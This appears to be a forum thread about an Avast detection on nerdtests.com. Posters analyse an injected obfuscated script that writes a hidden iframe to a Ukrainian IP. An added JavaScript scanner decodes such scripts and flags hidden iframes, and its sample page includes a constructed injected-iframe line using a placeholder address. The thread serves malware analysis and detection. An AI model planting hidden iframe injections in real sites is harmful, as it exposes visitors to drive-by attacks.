Nerdtests and Avast: Probably F/P?

So today I tried to open this site, but Avast thinks there is a trojan. I’m using Avast 5, but I didn’t get the alarm when I was using version 4. Avast also raises an alarm if you type the URL into Google. Also, my friend said that he got an alert with Avast 5.

VirusTotal - nerdtests.com.htm - 4/41
http://www.virustotal.com/analisis/cfeaba2eb3758ea4391bf7d660c46988b158ff2e4d55fa98adf6122fdc4cf4d5-1278531118

This page seems to be suspicious. 1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.nerdtests.com

NoVirusThanks - 3/16 - INFECTED
http://scanner.novirusthanks.org/analysis/8f4cbf447ed17e0c695a7846d4c1cc68/aW5kZXg=/

Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=a87ad2e60b4d1f2e09c65aea9d65e5ab&t=1278531513&type=js

It appears that one of the Google script tags has been hacked (2nd to last in the page code, see image1), inserting a long line of obfuscated JavaScript.

This script, when decoded (image2), creates a hidden iframe tag that tries to open an IP in the Ukraine, which is highly suspect.

So I believe that the detection is good.

Hi DavidR,

And what does that long unescape string do? Well, that is hexadecimal-coded JavaScript commands that are decoded according to lines as:
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus

What it does is shown in the last image and is what I said in the post (which seems to differ from your example): it creates a hidden iframe and connects to an IP in the Ukraine. After that I don’t care what it does, just that Avast has, in my mind, done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj]).

Even if your explanation is right, it is still a good detection by Avast. I just don’t go to any depth when I find what I consider is enough evidence to confirm a good detection.
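
The check discussed in the posts above (decode the long unescape string and see whether it writes a hidden iframe) can be done statically, without loading the page. This is an added example, not code from the thread or from Avast; the function names and the sample page are constructed, and 192.0.2.10 is a documentation-only placeholder, not the address seen on the site.

```javascript
// Static triage of inline scripts: decode unescape('%xx...') literals without
// executing them, then flag decoded markup that contains a hidden iframe.
const UNESCAPE_RE = /unescape\(\s*(['"])((?:%[0-9a-fA-F]{2}|%u[0-9a-fA-F]{4}){8,})\1\s*\)/g;

// Decode %xx and %uXXXX escapes as plain text; nothing is evaluated.
function decodePercent(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Return every <iframe> tag in the decoded text that is hidden from the user.
function hiddenIframes(decoded) {
  const tags = decoded.match(/<iframe\b[^>]*>/gi) || [];
  return tags.filter(tag => {
    const tiny = /\b(?:width|height)\s*=\s*["']?[01](?:px)?["'\s>]/i.test(tag);
    const styled = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(tag);
    return tiny || styled;
  }).map(tag => {
    const m = tag.match(/\bsrc\s*=\s*["']?([^"'\s>]+)/i);
    return { tag, src: m ? m[1] : null };
  });
}

// Scan page source and report each long unescape literal that hides an iframe.
function scanPage(html) {
  const findings = [];
  for (const m of html.matchAll(UNESCAPE_RE)) {
    const decoded = decodePercent(m[2]);
    const frames = hiddenIframes(decoded);
    if (frames.length) findings.push({ offset: m.index, decoded, frames });
  }
  return findings;
}

// Constructed sample page with one injected line. 192.0.2.10 is a
// documentation-only address (RFC 5737), used here as a placeholder.
const pct = s => [...s].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_PAGE = [
  '<html><body><p>quiz</p>',
  '<script>var a = unescape("%41%42");</script>', // short literal: ignored
  '<script>document.write(unescape("' +
    pct('<iframe src="http://192.0.2.10/" width="1" height="1" style="visibility:hidden"></iframe>') +
    '"));</script>',
  '</body></html>',
].join('\n');

console.log(JSON.stringify(scanPage(SAMPLE_PAGE), null, 2));
```

Each finding carries the decoded text and the iframe's `src`, which is the evidence needed to judge a detection like this one as genuine rather than a false positive.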

You’ve received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/

Thanks for the notice Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D